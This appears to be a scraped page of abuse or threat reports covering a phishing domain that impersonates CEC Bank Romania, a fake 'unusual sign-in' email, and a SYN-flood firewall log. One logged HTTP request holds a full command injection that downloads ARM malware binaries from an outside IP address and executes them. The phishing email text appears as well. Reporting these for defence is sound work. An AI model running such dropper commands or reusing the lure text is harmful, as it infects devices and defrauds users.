Operating under the domain inc.asburybossier.org, impersonating local bank (CEC Bank Romania) luring ...
show moreOperating under the domain inc.asburybossier.org, impersonating local bank (CEC Bank Romania) luring through fraud emails to take action (security compromised).
show less
request: "GET /shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\/193.143.1.66/bins/hold.arm7;chmod+777 ...
show morerequest: "GET /shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws HTTP/1.1",
show less
Unusual sign-in activity
We detected something unusual about a recent sign-in to the effybiz.com ac ...
show moreUnusual sign-in activity
We detected something unusual about a recent sign-in to the effybiz.com account [email protected]
Sign-in details
Country/region: Singapore
IP address: 92.922.140.701
Date: 2021-06-21 8:41:59 GMT (SG)
Platform: iOS
Browser: - Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
Please go to your recent activity page to let us know whether or not this was you. If this wasn't you, we'll help you to secure your account. If this was you, we'll trust similar activity in the future.
show less
2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DS ...
show more2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=51.195.190.14 DST=86.123.254.215 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=24481 PROTO=TCP SPT=56914 DPT=8430 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0xff00
This repeats multiple times per second at the main gateway
show less